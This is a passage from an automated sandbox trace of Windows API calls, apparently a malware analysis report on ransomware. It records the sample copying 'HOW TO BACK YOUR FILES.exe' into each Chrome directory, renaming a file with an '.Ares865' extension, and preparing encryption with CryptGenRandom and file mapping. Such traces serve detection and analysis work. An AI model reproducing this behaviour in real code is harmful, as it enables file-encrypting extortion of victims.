(x86)\\Google\\CrashReports", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Google\\CrashReports") returned="C:\\Program Files (x86)\\Google\\CrashReports" [0056.472] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2df710 | out: hHeap=0x2b0000) returned 1 [0056.472] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ae8 | out: hHeap=0x2b0000) returned 1 [0056.472] lstrlenW (lpString="C:\\Program Files (x86)\\Google\\CrashReports") returned 42 [0056.472] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Google\\CrashReports" | out: lpString1="C:\\Program Files (x86)\\Google\\CrashReports") returned="C:\\Program Files (x86)\\Google\\CrashReports" [0056.472] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.472] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Google\\CrashReports\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\google\\crashreports\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.477] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.477] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Google\\CrashReports\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c82ea80, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x532aa4c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x532aa4c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0056.477] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.477] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.477] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Google\\Chrome", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Google\\Chrome") returned="C:\\Program Files (x86)\\Google\\Chrome" [0056.477] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ed8a0 | out: hHeap=0x2b0000) returned 1 [0056.477] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ac8 | out: hHeap=0x2b0000) returned 1 [0056.477] lstrlenW (lpString="C:\\Program Files (x86)\\Google\\Chrome") returned 36 [0056.477] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Google\\Chrome" | out: lpString1="C:\\Program Files (x86)\\Google\\Chrome") returned="C:\\Program Files (x86)\\Google\\Chrome" [0056.477] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.477] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\google\\chrome\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.498] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.498] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7aa9d740, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x532aa4c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x532aa4c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0056.498] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.498] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.498] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application") returned="C:\\Program Files (x86)\\Google\\Chrome\\Application" [0056.498] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0056.498] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7be8 | out: hHeap=0x2b0000) returned 1 [0056.498] lstrlenW (lpString="C:\\Program Files (x86)\\Google\\Chrome\\Application") returned 48 [0056.498] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application" | out: lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application") returned="C:\\Program Files (x86)\\Google\\Chrome\\Application" [0056.498] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.498] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.503] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.503] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ded59e0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x532f6780, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x532f6780, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0056.503] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.503] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.503] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.VisualElementsManifest.xml.Ares865") returned 90 [0056.503] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.VisualElementsManifest.xml" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\chrome.visualelementsmanifest.xml"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.VisualElementsManifest.xml.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\chrome.visualelementsmanifest.xml.ares865"), dwFlags=0x1) returned 1 [0056.512] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.VisualElementsManifest.xml.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\chrome.visualelementsmanifest.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0056.512] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=410) returned 1 [0056.512] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0056.512] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2c8eb8 [0056.513] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0056.513] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0056.514] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0056.514] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0056.515] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4a0, lpName=0x0) returned 0x120 [0056.521] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4a0) returned 0x1a0000 [0056.552] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0056.553] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0056.553] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0056.553] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2c8f30 [0056.553] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8f30 | out: hHeap=0x2b0000) returned 1 [0056.553] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0056.553] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0056.554] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0056.554] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0056.554] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0056.554] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0056.554] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0056.554] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0056.554] UnmapViewOfFile (lpBaseAddress=0x1a0000) returned 1 [0056.554] CloseHandle (hObject=0x120) returned 1 [0056.554] CloseHandle (hObject=0x118) returned 1 [0056.556] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0056.556] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0056.556] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0056.556] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x532f6780, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x532f6780, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0056.556] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0056.556] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ded59e0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f252e00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f252e00, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SetupMetrics", cAlternateFileName="SETUPM~1")) returned 1 [0056.556] lstrcmpiW (lpString1="SetupMetrics", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0056.556] lstrcmpiW (lpString1="SetupMetrics", lpString2="aoldtz.exe") returned 1 [0056.556] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\SetupMetrics", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\SetupMetrics") returned="C:\\Program Files (x86)\\Google\\Chrome\\Application\\SetupMetrics" [0056.556] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0056.556] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7bc8 | out: hHeap=0x2b0000) returned 1 [0056.556] lstrlenW (lpString="C:\\Program Files (x86)\\Google\\Chrome\\Application\\SetupMetrics") returned 61 [0056.556] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\SetupMetrics" | out: lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\SetupMetrics") returned="C:\\Program Files (x86)\\Google\\Chrome\\Application\\SetupMetrics" [0056.556] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.556] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\SetupMetrics\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\setupmetrics\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.561] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.562] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\SetupMetrics\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ded59e0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53368ba0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53368ba0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0056.562] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.562] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.562] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110") returned="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110" [0056.562] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0056.562] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7be8 | out: hHeap=0x2b0000) returned 1 [0056.562] lstrlenW (lpString="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110") returned 62 [0056.562] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110" | out: lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110") returned="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110" [0056.562] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.562] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.574] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.574] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d78b680, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5338ed00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5338ed00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.574] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.574] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.574] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm") returned="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm" [0056.575] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3351a8 | out: hHeap=0x2b0000) returned 1 [0056.575] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b68 | out: hHeap=0x2b0000) returned 1 [0056.575] lstrlenW (lpString="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm") returned 74 [0056.575] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm" | out: lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm") returned="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm" [0056.575] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.575] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\widevinecdm\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.582] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.582] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d78b680, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x533b4e60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x533b4e60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.582] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.582] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.582] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific") returned="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific" [0056.582] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x318fc8 | out: hHeap=0x2b0000) returned 1 [0056.582] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b68 | out: hHeap=0x2b0000) returned 1 [0056.582] lstrlenW (lpString="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific") returned 93 [0056.582] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific" | out: lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific") returned="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific" [0056.582] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.583] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\widevinecdm\\_platform_specific\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.587] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.587] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d78b680, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x533b4e60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x533b4e60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.588] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.588] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.588] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64") returned="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64" [0056.588] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d40a8 | out: hHeap=0x2b0000) returned 1 [0056.588] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b68 | out: hHeap=0x2b0000) returned 1 [0056.588] lstrlenW (lpString="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64") returned 101 [0056.588] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64" | out: lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64") returned="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64" [0056.588] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.588] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\widevinecdm\\_platform_specific\\win_x64\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.603] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.603] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d78b680, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x533b4e60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x533b4e60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.603] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.603] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.603] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements") returned="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements" [0056.603] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0056.603] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b48 | out: hHeap=0x2b0000) returned 1 [0056.603] lstrlenW (lpString="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements") returned 77 [0056.603] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements" | out: lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements") returned="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements" [0056.603] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.603] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\visualelements\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.610] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.610] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d78b680, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x533dafc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x533dafc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, 